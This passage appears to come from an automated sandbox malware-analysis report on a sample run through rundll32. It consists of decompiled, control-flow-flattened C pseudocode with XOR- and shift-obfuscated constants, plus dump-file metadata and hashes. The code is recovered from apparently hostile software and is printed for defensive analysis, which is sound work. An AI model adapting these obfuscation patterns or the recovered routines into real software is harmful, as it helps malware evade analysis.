                                                                                                                      									__eflags = _t301 - 0xffffffff;
                                                                                                                      									if(__eflags != 0) {
                                                                                                                      										_t316 = 0xefecb64;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									if(_t316 == 0xe98dd96) {
                                                                                                                      										E00184DAD(_v616, _v596, _t344, _v664, _v604);
                                                                                                                      									} else {
                                                                                                                      										if(_t316 == 0xefecb64) {
                                                                                                                      											_t304 = _v568;
                                                                                                                      											_t321 = _v572;
                                                                                                                      											_v560 = _t304;
                                                                                                                      											_v552 = _t304;
                                                                                                                      											_v544 = _t304;
                                                                                                                      											_v536 = _t304;
                                                                                                                      											_v532 = _v660;
                                                                                                                      											_v564 = _t321;
                                                                                                                      											_v556 = _t321;
                                                                                                                      											_v548 = _t321;
                                                                                                                      											_v540 = _t321;
                                                                                                                      											_t307 = E00175D65(_t321, _t344, _v636, _t321,  &_v564, _v584, _v696, _v668);
                                                                                                                      											_t352 = _t352 + 0x18;
                                                                                                                      											__eflags = _t307;
                                                                                                                      											_t315 =  !=  ? 1 : _t315;
                                                                                                                      											_t316 = 0xe98dd96;
                                                                                                                      											continue;
                                                                                                                      										} else {
                                                                                                                      											_t362 = _t316 - 0xf7fe787;
                                                                                                                      											if(_t316 != 0xf7fe787) {
                                                                                                                      												goto L15;
                                                                                                                      											} else {
                                                                                                                      												_push(_v692);
                                                                                                                      												_push(_v676);
                                                                                                                      												_push(0x1710cc);
                                                                                                                      												_t308 = E0017AB66(_v648, _v644, _t362);
                                                                                                                      												_t309 =  *0x19520c; // 0x0
                                                                                                                      												_t311 =  *0x19520c; // 0x0
                                                                                                                      												E0017E7CE(_t308, _t362, _v588, _t311 + 8, _v648, _v640, _v684, _v632, _v652, _t309 + 0x220);
                                                                                                                      												E0017AE03(_v656, _v624, _v612, _t308);
                                                                                                                      												_t352 = _t352 + 0x34;
                                                                                                                      												_t316 = 0x5ceff6a;
                                                                                                                      												continue;
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L18:
                                                                                                                      						return _t315;
                                                                                                                      					}
                                                                                                                      					_v572 = _v572 - E00179A1E();
                                                                                                                      					_t316 = 0xf7fe787;
                                                                                                                      					asm("sbb [esp+0x94], edx");
                                                                                                                      					L15:
                                                                                                                      					__eflags = _t316 - 0x36ffdb;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				goto L18;
                                                                                                                      			}

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #?$8$V$aIg$qM
                                                                                                                      • API String ID: 0-1946175224
                                                                                                                      • Opcode ID: b66c230a8cd56499f78f41cf0ffe6d72af4ed8cdb9238a6b68ed473532f28f4d
                                                                                                                      • Instruction ID: 4dc0da62c57b1d82f80cd9a855def040ccda5f4c5c88153287c37bd61e60d2a9
                                                                                                                      • Opcode Fuzzy Hash: b66c230a8cd56499f78f41cf0ffe6d72af4ed8cdb9238a6b68ed473532f28f4d
                                                                                                                      • Instruction Fuzzy Hash: C1E11EB14087809FD368CF65C48A65BBBF1FBC4758F20891DF2AA86260D7B58949CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E00190867(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                      				intOrPtr _v4;
                                                                                                                      				intOrPtr _v8;
                                                                                                                      				intOrPtr* _v12;
                                                                                                                      				intOrPtr _v16;
                                                                                                                      				char _v20;
                                                                                                                      				intOrPtr _v24;
                                                                                                                      				intOrPtr _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				intOrPtr _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				intOrPtr _t261;
                                                                                                                      				intOrPtr* _t266;
                                                                                                                      				intOrPtr _t273;
                                                                                                                      				intOrPtr _t274;
                                                                                                                      				intOrPtr _t275;
                                                                                                                      				intOrPtr _t281;
                                                                                                                      				intOrPtr _t282;
                                                                                                                      				intOrPtr _t283;
                                                                                                                      				signed int _t307;
                                                                                                                      				signed int _t308;
                                                                                                                      				signed int _t309;
                                                                                                                      				signed int _t310;
                                                                                                                      				signed int _t311;
                                                                                                                      				signed int _t312;
                                                                                                                      				signed int _t313;
                                                                                                                      				intOrPtr _t314;
                                                                                                                      				void* _t316;
                                                                                                                      				intOrPtr _t317;
                                                                                                                      				intOrPtr _t318;
                                                                                                                      				intOrPtr _t319;
                                                                                                                      				signed int* _t320;
                                                                                                                      
                                                                                                                      				_t275 = __ecx;
                                                                                                                      				_t320 =  &_v116;
                                                                                                                      				_v12 = __edx;
                                                                                                                      				_v28 = __ecx;
                                                                                                                      				_v8 = 0x8dec59;
                                                                                                                      				_v4 = 0;
                                                                                                                      				_v84 = 0xe165d;
                                                                                                                      				_v84 = _v84 << 7;
                                                                                                                      				_v84 = _v84 + 0xc1b7;
                                                                                                                      				_v84 = _v84 ^ 0xc80f2461;
                                                                                                                      				_v84 = _v84 ^ 0xcf04d456;
                                                                                                                      				_v32 = 0x655f30;
                                                                                                                      				_v32 = _v32 + 0x312d;
                                                                                                                      				_v32 = _v32 ^ 0x0065b82f;
                                                                                                                      				_v56 = 0xcafed0;
                                                                                                                      				_v24 = 0;
                                                                                                                      				_t316 = 0x75256fb;
                                                                                                                      				_t307 = 0x74;
                                                                                                                      				_v56 = _v56 / _t307;
                                                                                                                      				_v56 = _v56 | 0x8b781090;
                                                                                                                      				_v56 = _v56 ^ 0x8b7ff779;
                                                                                                                      				_v96 = 0xabe325;
                                                                                                                      				_v96 = _v96 << 0xd;
                                                                                                                      				_v96 = _v96 ^ 0xcbcb3531;
                                                                                                                      				_v96 = _v96 | 0x09a083b5;
                                                                                                                      				_v96 = _v96 ^ 0xbfa5786a;
                                                                                                                      				_v76 = 0x7b9c0a;
                                                                                                                      				_t308 = 0x1c;
                                                                                                                      				_v76 = _v76 / _t308;
                                                                                                                      				_v76 = _v76 + 0xffff76d9;
                                                                                                                      				_v76 = _v76 ^ 0x00066890;
                                                                                                                      				_v80 = 0xfad268;
                                                                                                                      				_v80 = _v80 << 0x10;
                                                                                                                      				_v80 = _v80 ^ 0x68dc041b;
                                                                                                                      				_v80 = _v80 ^ 0xbab50c4e;
                                                                                                                      				_v112 = 0x5717c0;
                                                                                                                      				_v112 = _v112 + 0xd318;
                                                                                                                      				_v112 = _v112 + 0xffff9813;
                                                                                                                      				_v112 = _v112 ^ 0x80b72014;
                                                                                                                      				_v112 = _v112 ^ 0x80e33bd1;
                                                                                                                      				_v116 = 0x9f285d;
                                                                                                                      				_v116 = _v116 >> 9;
                                                                                                                      				_v116 = _v116 + 0xffff6359;
                                                                                                                      				_v116 = _v116 + 0x4b40;
                                                                                                                      				_v116 = _v116 ^ 0xfffb57cb;
                                                                                                                      				_v104 = 0x80a8a2;
                                                                                                                      				_t309 = 0x29;
                                                                                                                      				_v104 = _v104 * 0x2c;
                                                                                                                      				_v104 = _v104 | 0xf3fc02bd;
                                                                                                                      				_v104 = _v104 * 0x46;
                                                                                                                      				_v104 = _v104 ^ 0xcf237eb9;
                                                                                                                      				_v72 = 0x5bfbbd;
                                                                                                                      				_v72 = _v72 | 0xd3d7b19d;
                                                                                                                      				_v72 = _v72 << 0xe;
                                                                                                                      				_v72 = _v72 ^ 0xfee9d95e;
                                                                                                                      				_v108 = 0xd9b2ce;
                                                                                                                      				_v108 = _v108 << 0xf;
                                                                                                                      				_v108 = _v108 + 0xffff979e;
                                                                                                                      				_v108 = _v108 << 2;
                                                                                                                      				_v108 = _v108 ^ 0x6594627e;
                                                                                                                      				_v40 = 0xeed128;
                                                                                                                      				_v40 = _v40 * 0x34;
                                                                                                                      				_v40 = _v40 ^ 0x3088f647;
                                                                                                                      				_v68 = 0x4ae85e;
                                                                                                                      				_v68 = _v68 / _t309;
                                                                                                                      				_t310 = 0x35;
                                                                                                                      				_t319 = _v12;
                                                                                                                      				_v68 = _v68 * 0x53;
                                                                                                                      				_v68 = _v68 ^ 0x009a12ab;
                                                                                                                      				_v60 = 0xe58ccf;
                                                                                                                      				_v60 = _v60 / _t310;
                                                                                                                      				_v60 = _v60 >> 9;
                                                                                                                      				_v60 = _v60 ^ 0x00082ee6;
                                                                                                                      				_v100 = 0x896781;
                                                                                                                      				_v100 = _v100 ^ 0xb532ffdf;
                                                                                                                      				_t311 = 0x3d;
                                                                                                                      				_v100 = _v100 / _t311;
                                                                                                                      				_v100 = _v100 >> 0x10;
                                                                                                                      				_v100 = _v100 ^ 0x0003daf8;
                                                                                                                      				_v64 = 0xd8c0ce;
                                                                                                                      				_v64 = _v64 + 0xffffaca0;
                                                                                                                      				_v64 = _v64 << 0xc;
                                                                                                                      				_v64 = _v64 ^ 0x86dd78e3;
                                                                                                                      				_v36 = 0xf932ba;
                                                                                                                      				_t312 = 0x7f;
                                                                                                                      				_v36 = _v36 * 0x58;
                                                                                                                      				_v36 = _v36 ^ 0x55a76b7b;
                                                                                                                      				_v88 = 0x9f6659;
                                                                                                                      				_v88 = _v88 / _t312;
                                                                                                                      				_v88 = _v88 | 0x1ff6fbbf;
                                                                                                                      				_v88 = _v88 ^ 0xc9c88694;
                                                                                                                      				_v88 = _v88 ^ 0xd6316d06;
                                                                                                                      				_v48 = 0x252418;
                                                                                                                      				_v48 = _v48 ^ 0x008304c1;
                                                                                                                      				_v48 = _v48 + 0xffff4e21;
                                                                                                                      				_v48 = _v48 ^ 0x00a4a0c7;
                                                                                                                      				_v92 = 0xdb5076;
                                                                                                                      				_v92 = _v92 + 0xffff1b85;
                                                                                                                      				_v92 = _v92 | 0x2d9bcef8;
                                                                                                                      				_t313 = 0x68;
                                                                                                                      				_v92 = _v92 / _t313;
                                                                                                                      				_v92 = _v92 ^ 0x0076c4f2;
                                                                                                                      				_v52 = 0x242151;
                                                                                                                      				_v52 = _v52 | 0x94ee4ace;
                                                                                                                      				_v52 = _v52 + 0xf8ef;
                                                                                                                      				_v52 = _v52 ^ 0x94e81f3d;
                                                                                                                      				_t314 = _v4;
                                                                                                                      				_t274 = _v8;
                                                                                                                      				L1:
                                                                                                                      				while(1) {
                                                                                                                      					do {
                                                                                                                      						while(_t316 != 0x1075595) {
                                                                                                                      							if(_t316 == 0x75256fb) {
                                                                                                                      								_t316 = 0x1075595;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t316 != 0xe0f16ec) {
                                                                                                                      									goto L15;
                                                                                                                      								} else {
                                                                                                                      									_t281 = E0017840B(_v76,  &_v20, _v80, _t275, _v112, _t319, _v116, _t261);
                                                                                                                      									_t320 =  &(_t320[6]);
                                                                                                                      									_v24 = _t281;
                                                                                                                      									if(_t281 == 0) {
                                                                                                                      										_t317 = _v24;
                                                                                                                      										L20:
                                                                                                                      										E001768DE(_v88, _v48, _v92, _v52, _t274);
                                                                                                                      									} else {
                                                                                                                      										_t282 = _v20;
                                                                                                                      										if(_t282 == 0) {
                                                                                                                      											goto L16;
                                                                                                                      										} else {
                                                                                                                      											_v44 = _v44 + _t282;
                                                                                                                      											_t319 = _t319 - _t282;
                                                                                                                      											if(_t319 != 0) {
                                                                                                                      												L9:
                                                                                                                      												_t261 = _v44;
                                                                                                                      												L10:
                                                                                                                      												_t275 = _v28;
                                                                                                                      												_t316 = 0xe0f16ec;
                                                                                                                      												continue;
                                                                                                                      											} else {
                                                                                                                      												_t283 = _t314 + _t314;
                                                                                                                      												_push(_t283);
                                                                                                                      												_push(_t283);
                                                                                                                      												_v16 = _t283;
                                                                                                                      												_t318 = E00183512(_t283);
                                                                                                                      												if(_t318 == 0) {
                                                                                                                      													goto L16;
                                                                                                                      												} else {
                                                                                                                      													E0018FD29(_t274, _v40, _t318, _v68, _t314);
                                                                                                                      													E001768DE(_v60, _v100, _v64, _v36, _t274);
                                                                                                                      													_t319 = _t314;
                                                                                                                      													_t273 = _t318 + _t314;
                                                                                                                      													_t314 = _v16;
                                                                                                                      													_t320 =  &(_t320[6]);
                                                                                                                      													_v44 = _t273;
                                                                                                                      													_t274 = _t318;
                                                                                                                      													if(_t319 == 0) {
                                                                                                                      														goto L16;
                                                                                                                      													} else {
                                                                                                                      														goto L9;
                                                                                                                      													}
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							L18:
                                                                                                                      							return _t317;
                                                                                                                      						}
                                                                                                                      						_t314 = 0x10000;
                                                                                                                      						_push(_t275);
                                                                                                                      						_push(_t275);
                                                                                                                      						_t261 = E00183512(0x10000);
                                                                                                                      						_t274 = _t261;
                                                                                                                      						if(_t274 == 0) {
                                                                                                                      							_t275 = _v28;
                                                                                                                      							_t316 = 0x6559491;
                                                                                                                      							goto L15;
                                                                                                                      						} else {
                                                                                                                      							_v44 = _t261;
                                                                                                                      							_t319 = 0x10000;
                                                                                                                      							goto L10;
                                                                                                                      						}
                                                                                                                      						goto L18;
                                                                                                                      						L15:
                                                                                                                      						_t261 = _v44;
                                                                                                                      					} while (_t316 != 0x6559491);
                                                                                                                      					L16:
                                                                                                                      					_t317 = _v24;
                                                                                                                      					if(_t317 == 0) {
                                                                                                                      						goto L20;
                                                                                                                      					} else {
                                                                                                                      						_t266 = _v12;
                                                                                                                      						 *_t266 = _t274;
                                                                                                                      						 *((intOrPtr*)(_t266 + 4)) = _t314 - _t319;
                                                                                                                      					}
                                                                                                                      					goto L18;
                                                                                                                      				}
                                                                                                                      			}






















































                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: -1$0_e$@K$Q!$$^J
                                                                                                                      • API String ID: 0-785566946
                                                                                                                      • Opcode ID: 41ea18c928f5bc6e050d69f8087d6909cd5aff65254f797b7e67a5a6cbd5e357
                                                                                                                      • Instruction ID: 2f95b21d7b212887bdbc443d4286cecb10a6864143be463f3881a8f8c7c4580f
                                                                                                                      • Opcode Fuzzy Hash: 41ea18c928f5bc6e050d69f8087d6909cd5aff65254f797b7e67a5a6cbd5e357
                                                                                                                      • Instruction Fuzzy Hash: 39C10FB15083819FC358DF69C48980BFBE1FBD9798F508A1DF5A696220D3B1D949CF82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 99%
                                                                                                                      			E00180946(void* __ecx, void* __edx) {
                                                                                                                      				signed int _v4;
                                                                                                                      				intOrPtr _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _t226;
                                                                                                                      				signed int _t228;
                                                                                                                      				void* _t231;
                                                                                                                      				signed int _t233;
                                                                                                                      				signed int _t234;
                                                                                                                      				signed int _t235;
                                                                                                                      				signed int _t236;
                                                                                                                      				signed int _t237;
                                                                                                                      				void* _t263;
                                                                                                                      				void* _t264;
                                                                                                                      				signed int _t265;
                                                                                                                      				signed int* _t267;
                                                                                                                      				signed int* _t268;
                                                                                                                      
                                                                                                                      				_t267 =  &_v88;
                                                                                                                      				_v4 = _v4 & 0x00000000;
                                                                                                                      				_v8 = 0xb66c37;
                                                                                                                      				_v72 = 0xb73c2;
                                                                                                                      				_v72 = _v72 << 4;
                                                                                                                      				_v72 = _v72 | 0x07739320;
                                                                                                                      				_v72 = _v72 << 9;
                                                                                                                      				_v72 = _v72 ^ 0xef7952b0;
                                                                                                                      				_v28 = 0x2a4560;
                                                                                                                      				_v28 = _v28 + 0x8659;
                                                                                                                      				_v28 = _v28 ^ 0x002a9629;
                                                                                                                      				_v76 = 0x8c4def;
                                                                                                                      				_t263 = __edx;
                                                                                                                      				_t231 = __ecx;
                                                                                                                      				_t264 = 0xd46e588;
                                                                                                                      				_t233 = 0x74;
                                                                                                                      				_v76 = _v76 / _t233;
                                                                                                                      				_t234 = 0x6c;
                                                                                                                      				_v76 = _v76 * 3;
                                                                                                                      				_v76 = _v76 >> 5;
                                                                                                                      				_v76 = _v76 ^ 0x000c6890;
                                                                                                                      				_v80 = 0x921d05;
                                                                                                                      				_v80 = _v80 + 0xffff1131;
                                                                                                                      				_v80 = _v80 / _t234;
                                                                                                                      				_v80 = _v80 + 0xffff8087;
                                                                                                                      				_v80 = _v80 ^ 0x0007528b;
                                                                                                                      				_v20 = 0x474e9c;
                                                                                                                      				_t235 = 0xb;
                                                                                                                      				_v20 = _v20 * 0x25;
                                                                                                                      				_v20 = _v20 ^ 0x0a4b2981;
                                                                                                                      				_v44 = 0x41d7a6;
                                                                                                                      				_v44 = _v44 >> 4;
                                                                                                                      				_v44 = _v44 + 0xffffa7bd;
                                                                                                                      				_v44 = _v44 ^ 0x00093433;
                                                                                                                      				_v68 = 0x96e6ad;
                                                                                                                      				_v68 = _v68 * 0xe;
                                                                                                                      				_v68 = _v68 + 0x1201;
                                                                                                                      				_v68 = _v68 >> 9;
                                                                                                                      				_v68 = _v68 ^ 0x000fa369;
                                                                                                                      				_v24 = 0xe45c66;
                                                                                                                      				_t66 =  &_v24; // 0xe45c66
                                                                                                                      				_v24 =  *_t66 / _t235;
                                                                                                                      				_v24 = _v24 ^ 0x001eca74;
                                                                                                                      				_v12 = 0xe2325f;
                                                                                                                      				_v12 = _v12 >> 2;
                                                                                                                      				_v12 = _v12 ^ 0x003de0fa;
                                                                                                                      				_v40 = 0xdcdb46;
                                                                                                                      				_v40 = _v40 + 0xfb03;
                                                                                                                      				_v40 = _v40 + 0xffff4ab2;
                                                                                                                      				_v40 = _v40 ^ 0x00d010f5;
                                                                                                                      				_v16 = 0xf0578c;
                                                                                                                      				_t236 = 0x25;
                                                                                                                      				_v16 = _v16 * 0x2d;
                                                                                                                      				_v16 = _v16 ^ 0x2a381d62;
                                                                                                                      				_v60 = 0xf0efbe;
                                                                                                                      				_v60 = _v60 / _t236;
                                                                                                                      				_t265 = 0x18;
                                                                                                                      				_v60 = _v60 / _t265;
                                                                                                                      				_v60 = _v60 + 0xffffc994;
                                                                                                                      				_v60 = _v60 ^ 0x00051ba1;
                                                                                                                      				_v64 = 0xfb78a0;
                                                                                                                      				_v64 = _v64 << 9;
                                                                                                                      				_t237 = 0x41;
                                                                                                                      				_v64 = _v64 / _t237;
                                                                                                                      				_v64 = _v64 | 0xcaafab65;
                                                                                                                      				_v64 = _v64 ^ 0xcbeb608b;
                                                                                                                      				_v84 = 0xb70797;
                                                                                                                      				_v84 = _v84 ^ 0x7f243ece;
                                                                                                                      				_v84 = _v84 | 0x19416b2b;
                                                                                                                      				_v84 = _v84 ^ 0xcf7db733;
                                                                                                                      				_v84 = _v84 ^ 0xb0a40cc8;
                                                                                                                      				_v88 = 0xcdb2b9;
                                                                                                                      				_v88 = _v88 + 0x7ca0;
                                                                                                                      				_v88 = _v88 + 0xffff4266;
                                                                                                                      				_v88 = _v88 / _t265;
                                                                                                                      				_v88 = _v88 ^ 0x000ad15f;
                                                                                                                      				_v32 = 0x3f4742;
                                                                                                                      				_v32 = _v32 + 0xffff8438;
                                                                                                                      				_v32 = _v32 ^ 0x00328def;
                                                                                                                      				_v48 = 0xe7fa35;
                                                                                                                      				_v48 = _v48 | 0x5473134a;
                                                                                                                      				_v48 = _v48 + 0x6bf3;
                                                                                                                      				_v48 = _v48 ^ 0x54f160bb;
                                                                                                                      				_v36 = 0x82f06;
                                                                                                                      				_v36 = _v36 >> 1;
                                                                                                                      				_v36 = _v36 * 0x4f;
                                                                                                                      				_v36 = _v36 ^ 0x0140909c;
                                                                                                                      				_v52 = 0x77cd37;
                                                                                                                      				_v52 = _v52 << 0xb;
                                                                                                                      				_v52 = _v52 ^ 0x0f05aaad;
                                                                                                                      				_v52 = _v52 * 0x5b;
                                                                                                                      				_v52 = _v52 ^ 0x116d7cbe;
                                                                                                                      				_v56 = 0x6cb0a3;
                                                                                                                      				_v56 = _v56 + 0xab46;
                                                                                                                      				_v56 = _v56 >> 0x10;
                                                                                                                      				_v56 = _v56 + 0x7715;
                                                                                                                      				_v56 = _v56 ^ 0x0001d55a;
                                                                                                                      				do {
                                                                                                                      					while(_t264 != 0x8d90b87) {
                                                                                                                      						if(_t264 == 0x991fac7) {
                                                                                                                      							return E0017F88A(_v36, _v52, _v56,  *(_t263 + 0x30));
                                                                                                                      						}
                                                                                                                      						if(_t264 == 0xa3f1429) {
                                                                                                                      							_push(_t237);
                                                                                                                      							_t228 = E00188D71(_v72, _v28, __eflags, _v76, _v80, _t231);
                                                                                                                      							_t268 =  &(_t267[4]);
                                                                                                                      							 *(_t263 + 0x30) = _t228;
                                                                                                                      							__eflags = _t228;
                                                                                                                      							if(_t228 != 0) {
                                                                                                                      								E0017EE05(_v44, _v68, _v24, _t228, _t228);
                                                                                                                      								_t237 =  *(_t263 + 0x30);
                                                                                                                      								E0018E713(_t237, _v12, _v40, _v16);
                                                                                                                      								_t267 =  &(_t268[6]);
                                                                                                                      								_t264 = 0x8d90b87;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							if(_t264 == 0xd46e588) {
                                                                                                                      								_t264 = 0xa3f1429;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t264 != 0xf9322b8) {
                                                                                                                      									goto L14;
                                                                                                                      								} else {
                                                                                                                      									_t237 = E00176ED6;
                                                                                                                      									_t228 = E00184EFF(E00176ED6, _v84, E00176ED6, E00176ED6, _v88, _v32, E00176ED6, _v48, _t263);
                                                                                                                      									_t267 =  &(_t267[8]);
                                                                                                                      									 *(_t263 + 0x24) = _t228;
                                                                                                                      									if(_t228 == 0) {
                                                                                                                      										_t264 = 0x991fac7;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						return _t228;
                                                                                                                      						L18:
                                                                                                                      					}
                                                                                                                      					_t237 = _v60;
                                                                                                                      					_t226 = E00182BDE(_t237,  *(_t263 + 0x30), _v64);
                                                                                                                      					_t267 =  &(_t267[1]);
                                                                                                                      					 *(_t263 + 0xc) = _t226;
                                                                                                                      					__eflags = _t226;
                                                                                                                      					if(__eflags == 0) {
                                                                                                                      						_t264 = 0x991fac7;
                                                                                                                      						goto L14;
                                                                                                                      					} else {
                                                                                                                      						_t264 = 0xf9322b8;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					goto L18;
                                                                                                                      					L14:
                                                                                                                      					__eflags = _t264 - 0x74fce14;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				return _t228;
                                                                                                                      			}






































                                                                                                                      0x00180b4e
                                                                                                                      0x00180b56
                                                                                                                      0x00180b5e
                                                                                                                      0x00180b71
                                                                                                                      0x00180b75
                                                                                                                      0x00180b7d
                                                                                                                      0x00180b85
                                                                                                                      0x00180b8d
                                                                                                                      0x00180b95
                                                                                                                      0x00180b9d
                                                                                                                      0x00180ba5
                                                                                                                      0x00180bad
                                                                                                                      0x00180bb5
                                                                                                                      0x00180bbd
                                                                                                                      0x00180bc6
                                                                                                                      0x00180bca
                                                                                                                      0x00180bd2
                                                                                                                      0x00180bda
                                                                                                                      0x00180bdf
                                                                                                                      0x00180bec
                                                                                                                      0x00180bf0
                                                                                                                      0x00180bf8
                                                                                                                      0x00180c00
                                                                                                                      0x00180c08
                                                                                                                      0x00180c0d
                                                                                                                      0x00180c15
                                                                                                                      0x00180c1d
                                                                                                                      0x00180c1d
                                                                                                                      0x00180c2b
                                                                                                                      0x00000000
                                                                                                                      0x00180d2a
                                                                                                                      0x00180c37
                                                                                                                      0x00180c84
                                                                                                                      0x00180c96
                                                                                                                      0x00180c9b
                                                                                                                      0x00180c9e
                                                                                                                      0x00180ca1
                                                                                                                      0x00180ca3
                                                                                                                      0x00180cbb
                                                                                                                      0x00180ccc
                                                                                                                      0x00180ccf
                                                                                                                      0x00180cd4
                                                                                                                      0x00180cd7
                                                                                                                      0x00000000
                                                                                                                      0x00180cd7
                                                                                                                      0x00180c39
                                                                                                                      0x00180c3f
                                                                                                                      0x00180c7d
                                                                                                                      0x00000000
                                                                                                                      0x00180c41
                                                                                                                      0x00180c47
                                                                                                                      0x00000000
                                                                                                                      0x00180c4d
                                                                                                                      0x00180c61
                                                                                                                      0x00180c66
                                                                                                                      0x00180c6b
                                                                                                                      0x00180c6e
                                                                                                                      0x00180c73
                                                                                                                      0x00180c79
                                                                                                                      0x00000000
                                                                                                                      0x00180c79
                                                                                                                      0x00180c73
                                                                                                                      0x00180c47
                                                                                                                      0x00180c3f
                                                                                                                      0x00180d32
                                                                                                                      0x00000000
                                                                                                                      0x00180d32
                                                                                                                      0x00180ce8
                                                                                                                      0x00180cec
                                                                                                                      0x00180cf1
                                                                                                                      0x00180cf4
                                                                                                                      0x00180cf7
                                                                                                                      0x00180cf9
                                                                                                                      0x00180d05
                                                                                                                      0x00000000
                                                                                                                      0x00180cfb
                                                                                                                      0x00180cfb
                                                                                                                      0x00000000
                                                                                                                      0x00180cfb
                                                                                                                      0x00000000
                                                                                                                      0x00180d07
                                                                                                                      0x00180d07
                                                                                                                      0x00180d07
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 34$BG?$_2$`E*$f\
                                                                                                                      • API String ID: 0-782548322
                                                                                                                      • Opcode ID: cb5bf809f2ae41bd07a9f6dd2e611600e8f10190dfbc9bc8b936a4f4f13bace1
                                                                                                                      • Instruction ID: b09c46857c4a538689416fc1fdea42a41aa2a82866d4ff6a351826bc8760c4b7
                                                                                                                      • Opcode Fuzzy Hash: cb5bf809f2ae41bd07a9f6dd2e611600e8f10190dfbc9bc8b936a4f4f13bace1
                                                                                                                      • Instruction Fuzzy Hash: 5EA150B29087419FC388DF64C88980BFBE1BBC8758F408A1DF49996260D7B5DA48CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E0018561F(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                      				signed int _v4;
                                                                                                                      				intOrPtr _v8;
                                                                                                                      				intOrPtr _v12;
                                                                                                                      				char _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				unsigned int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				void* _t181;
                                                                                                                      				signed int _t191;
                                                                                                                      				void* _t203;
